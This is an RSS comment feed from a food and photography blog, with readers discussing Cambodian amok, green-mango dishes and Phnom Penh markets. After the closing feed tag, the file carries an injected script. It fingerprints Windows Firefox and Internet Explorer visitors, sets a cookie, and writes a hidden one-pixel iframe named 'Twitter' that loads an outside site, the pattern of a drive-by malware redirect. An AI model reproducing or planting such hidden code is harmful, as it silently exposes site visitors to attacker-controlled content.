<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Sweet!</title>
	<atom:link href="http://www.austinbushphotography.com/2007/01/sweet.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/sweet.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Four Seasons Bangkok WGF10: Christine Manfield - Austin Bush Photography</title>
		<link>http://www.austinbushphotography.com/blog/sweet.html#comment-27341</link>
		<dc:creator>Four Seasons Bangkok WGF10: Christine Manfield - Austin Bush Photography</dc:creator>
		<pubDate>Fri, 09 Oct 2009 04:53:57 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/01/sweet.html#comment-27341</guid>
		<description>[...] In fact, the combination of smoked fish and thin strips of green mango was eerily similar to ngnoam swei kchey trey cha, a Cambodian dish that also revolves around these two main [...]</description>
		<content:encoded><![CDATA[<p>[...] In fact, the combination of smoked fish and thin strips of green mango was eerily similar to ngnoam swei kchey trey cha, a Cambodian dish that also revolves around these two main [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Austin</title>
		<link>http://www.austinbushphotography.com/blog/sweet.html#comment-561</link>
		<dc:creator>Austin</dc:creator>
		<pubDate>Tue, 06 Feb 2007 11:40:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/01/sweet.html#comment-561</guid>
		<description>mea: There are actually many restaurants of this level, and much higher, in Phnom Penh nowadays. In terms of markets I really liked the Psar Orussei. Not just the main market building but also the fresh markets that extend along the side streets outside. The produce in particular looked great, even better than what&#039;s available in BKK!&lt;br /&gt;&lt;br /&gt;colin: no, I think you just crunch though the veggies raw.&lt;br /&gt;&lt;br /&gt;yata: they&#039;re nearly identical, except that the Khmer version adds a kind of dried fish and seems to be always be served with veggies.</description>
		<content:encoded><![CDATA[<p>mea: There are actually many restaurants of this level, and much higher, in Phnom Penh nowadays. In terms of markets I really liked the Psar Orussei. Not just the main market building but also the fresh markets that extend along the side streets outside. The produce in particular looked great, even better than what&#8217;s available in BKK!</p>
<p>colin: no, I think you just crunch though the veggies raw.</p>
<p>yata: they&#8217;re nearly identical, except that the Khmer version adds a kind of dried fish and seems to be always be served with veggies.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Colin</title>
		<link>http://www.austinbushphotography.com/blog/sweet.html#comment-544</link>
		<dc:creator>Colin</dc:creator>
		<pubDate>Thu, 01 Feb 2007 01:54:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/01/sweet.html#comment-544</guid>
		<description>Looks great! The amok looks yummy. &lt;br /&gt;How does the omelet work as a dipping sauce like nam prik?</description>
		<content:encoded><![CDATA[<p>Looks great! The amok looks yummy. <br />How does the omelet work as a dipping sauce like nam prik?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: mea</title>
		<link>http://www.austinbushphotography.com/blog/sweet.html#comment-542</link>
		<dc:creator>mea</dc:creator>
		<pubDate>Wed, 31 Jan 2007 12:09:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/01/sweet.html#comment-542</guid>
		<description>I&#039;m not familiar with the restaurant, but that&#039;s not just slightly upscale, is it?  That&#039;s an actual ramekin.  In Cambodia.  &lt;br /&gt;&lt;br /&gt;The amok looks delicious, and I&#039;m jealous.  Although my mother&#039;s version has always been more...solid...and we steam it in a bundle of kale or banana leaves state-side.&lt;br /&gt;&lt;br /&gt;I&#039;m curious to know how you felt about the markets, like Psa Thom.  I kind of miss the chaos, myself.</description>
		<content:encoded><![CDATA[<p>I&#8217;m not familiar with the restaurant, but that&#8217;s not just slightly upscale, is it?  That&#8217;s an actual ramekin.  In Cambodia.  </p>
<p>The amok looks delicious, and I&#8217;m jealous.  Although my mother&#8217;s version has always been more&#8230;solid&#8230;and we steam it in a bundle of kale or banana leaves state-side.</p>
<p>I&#8217;m curious to know how you felt about the markets, like Psa Thom.  I kind of miss the chaos, myself.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

